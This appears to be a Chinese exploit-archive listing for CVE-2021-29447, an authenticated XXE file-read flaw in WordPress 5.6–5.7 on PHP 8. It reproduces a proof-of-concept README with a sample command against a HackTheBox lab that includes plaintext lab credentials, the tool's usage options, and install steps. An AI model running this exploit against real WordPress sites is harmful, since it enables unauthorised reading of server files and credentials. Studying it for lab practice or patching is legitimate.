关联漏洞
标题:
WordPress 代码问题漏洞
(CVE-2021-29447)
描述:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
描述
CVE-2021-29447 - Authenticated XXE Injection - WordPress < 5.7.1 & PHP > 8
介绍
# CVE-2021-29447
POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection. More about this CVE [here](https://www.sonarsource.com/blog/wordpress-xxe-security-vulnerability/)
## Example
Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress website with Media Library vulnerable to XXE Injection.
```bash
python lfi.py -u manager -p partylikearockstar -t metapress.htb -lh 10.10.XX.XX -lp 8081 -w file_wordlist
```
[](https://asciinema.org/a/wqBueScWdUnuG4HzHbYPuOThI)
## Usage
```bash
usage: lfi.py [-h] -u USERNAME -p PASSWORD -t TARGET -lh LHOST [-lp LPORT] [-w WORDLIST] [-i] [-v] [-s]
[filenames ...]
positional arguments:
filenames Filenames to fetch
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to user in authenticated upload
-p PASSWORD, --password PASSWORD
Password to user in authenticated upload
-t TARGET, --target TARGET
Remote host to target, e.g. "metapress.htb"
-lh LHOST, --host LHOST
Hostname on which server is bound (default "")
-lp LPORT, --port LPORT
Listening port (default "8080")
-w WORDLIST, --wordlist WORDLIST
Wordlist of filenames to be fetched
-i, --interactive Runs in interactive mode
-v, --verbose Enables verbose mode
-s, --skip Skip php server spin-up (MAKE SURE IT IS ALREADY RUNNING!)
```
## Installation
**Make sure you have php installed.**
```bash
git clone https://github.com/viardant/CVE-2021-29447
cd CVE-2021-29447
pip install -r requirements.txt
```
文件快照
[4.0K] /data/pocs/dbf0f754cbfd94c3ef9b1854d249a5b7ae3f5231
├── [ 434] grab.php
├── [ 11K] lfi.py
├── [ 34K] LICENSE
├── [1.7K] README.md
└── [ 18] requirements.txt
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。